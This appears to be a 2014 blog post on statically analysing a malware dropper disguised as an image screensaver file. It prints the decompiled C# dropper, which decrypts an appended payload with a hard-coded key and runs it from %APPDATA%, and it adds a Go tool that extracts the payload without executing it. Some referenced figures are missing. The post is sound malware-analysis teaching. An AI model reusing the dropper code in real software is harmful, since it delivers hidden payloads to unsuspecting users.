Monday, February 24, 2014

Basic analysis

Hi.

Today we're going to do a basic analysis of some virus. In the last note I mentioned that you have two ways to analyze viruses, malware, etc.:
  • basic analysis
  • dynamic analysis
Dynamic analysis is very simple, because you only run the suspect file and watch its behaviour using a variety of programs like Wireshark, RegShot, etc. Today I won't be explaining how to use dynamic analysis, though. OK, so let's start. The suspect file is called IMG_PhotoView_SAM68403(1).scr. We load this file into Exeinfo PE (you can use PEiD instead, but I'm using Exeinfo PE) and we see that this file is written in C#, so we can load it into .NET Reflector and see the code:
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;

internal class Program
{
    // Fields
    private string f;

    // Methods
    private static void Main(string[] args)
    {
        try
        {
            // Drop location: %APPDATA%
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            // The dropper reads its own executable as text; the payload is appended after a marker string
            string str2 = File.ReadAllText(Process.GetCurrentProcess().MainModule.FileName);
            string[] separator = new string[] { "[024578974asf6843sr6g87g67]" };
            string[] strArray2 = str2.Split(separator, StringSplitOptions.None);
            // Segment [1] is the base64 of the encrypted payload, segment [2] the file name to drop it under
            byte[] bytes = UnSecure(Convert.FromBase64String(strArray2[1]));
            File.WriteAllBytes(folderPath + @"\" + strArray2[2], bytes);
            // Executes the dropped file
            Process.Start(folderPath + @"\" + strArray2[2]);
        }
        catch
        {
            // Any failure is silently swallowed
        }
    }

    // Rijndael (AES, 128-bit block) with the class defaults: CBC mode, PKCS7 padding, hard-coded key and IV
    private static byte[] UnSecure(byte[] data)
    {
        RijndaelManaged managed = new RijndaelManaged();
        byte[] buffer = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7 };
        byte[] buffer2 = new byte[] { 7, 6, 5, 4, 3, 2, 1, 9, 8, 7, 6, 5, 4, 3, 2, 1 };
        managed.IV = buffer;
        managed.Key = buffer2;
        return managed.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
    }
}
Since we already have the code, we're also able to copy it, but remember that we need to remove the Process.Start call and change the path to our suspect file; then we can run our program and get the dropped file, which in my case is called lkjyhgtrt.exe and is written in Delphi. So let's load it into IDA, but before beginning the analysis I recommend applying signatures in IDA. It'll make the analysis simpler and easier. The main goal is to find functions like: connect to server/FTP/IRC, download file, create a new thread, etc. The interesting function for us is at address 0x00493DAC. The function checks a command returned from the attacker's server and then executes it. There are a lot of implemented commands, for example:

And an example function:

And one more thing that could be interesting: this suspect file contains a meme in its resources. You can use Resource Hacker to see it. The virus loads this meme and shows it, but I don't encourage running the virus only to see this meme :>
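The "copy the code and remove Process.Start" step above can be done as a small stand-alone extractor that never touches the payload beyond writing it to disk. The following Go program is an added example, not code from the original post or from the sample: it parses a carrier file in the format the decompiled Program class shows (split on the delimiter, base64-decode segment [1], decrypt with the hard-coded key and IV, take the file name from segment [2]) and writes the result into a directory you choose. It assumes what RijndaelManaged does with a 16-byte key and default settings, namely AES-128 in CBC mode with PKCS7 padding; the function names and the usage are mine. Unlike the dropper it validates the padding and reduces the embedded file name to its last path component, so a crafted carrier cannot make the extractor write outside the output directory.

```go
// Static payload extractor for the carrier format shown by the decompiled Program class above. Added example, not code from the original post.
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Delimiter, IV and key exactly as they appear in the decompiled code.
const delimiter = "[024578974asf6843sr6g87g67]"

var dropperIV = []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7}
var dropperKey = []byte{7, 6, 5, 4, 3, 2, 1, 9, 8, 7, 6, 5, 4, 3, 2, 1}

// unpadPKCS7 validates and strips the padding that TransformFinalBlock removes implicitly on the .NET side.
func unpadPKCS7(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad PKCS7 padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad PKCS7 padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// UnSecure mirrors the dropper's UnSecure(): RijndaelManaged with a 16-byte
// key and default settings is AES-128 in CBC mode with PKCS7 padding (assumed here).
func UnSecure(ct []byte) ([]byte, error) {
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of 16")
	}
	block, err := aes.NewCipher(dropperKey)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, dropperIV).CryptBlocks(pt, ct)
	return unpadPKCS7(pt)
}

// safeName keeps only the last path component of the embedded file name, so
// a crafted carrier cannot steer the extractor outside its output directory.
func safeName(raw string) string {
	raw = strings.TrimSpace(raw)
	if i := strings.LastIndexAny(raw, `/\`); i >= 0 {
		raw = raw[i+1:]
	}
	if raw == "" || raw == "." || raw == ".." {
		return "payload.bin"
	}
	return raw
}

// ExtractPayload parses carrier bytes the way Main() does: segment [1] is the base64 ciphertext, segment [2] the drop name.
func ExtractPayload(carrier []byte) (name string, data []byte, err error) {
	parts := bytes.Split(carrier, []byte(delimiter))
	if len(parts) < 3 {
		return "", nil, fmt.Errorf("expected 3 delimited segments, got %d", len(parts))
	}
	ct, err := base64.StdEncoding.DecodeString(strings.TrimSpace(string(parts[1])))
	if err != nil {
		return "", nil, fmt.Errorf("segment 1 is not valid base64: %w", err)
	}
	if data, err = UnSecure(ct); err != nil {
		return "", nil, err
	}
	return safeName(string(parts[2])), data, nil
}

func die(err error) { fmt.Fprintln(os.Stderr, err); os.Exit(1) }

// Usage: go run extract.go <carrier.scr> <output-dir>. The payload is written out for offline analysis and never executed.
func main() {
	if len(os.Args) != 3 {
		die(errors.New("usage: extract <carrier.scr> <output-dir>"))
	}
	carrier, err := os.ReadFile(os.Args[1])
	if err != nil {
		die(err)
	}
	name, data, err := ExtractPayload(carrier)
	if err != nil {
		die(err)
	}
	out := filepath.Join(os.Args[2], name)
	if err := os.WriteFile(out, data, 0o600); err != nil {
		die(err)
	}
	fmt.Printf("wrote %d bytes to %s (embedded name %q)\n", len(data), out, name)
}
```

A padding error from UnSecure usually means the delimiter split or the base64 segment is wrong for the sample at hand, or that a related sample uses a different key or IV; in that case the values to change are the two arrays at the top, taken from the decompiled UnSecure of that sample. The approach only works because the key and IV are hard-coded in the binary, which is exactly what makes this kind of dropper easy to unpack statically.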

OK, that's all. If you have any questions, you're welcome to post them in the comments.

Link to unpacked file: link
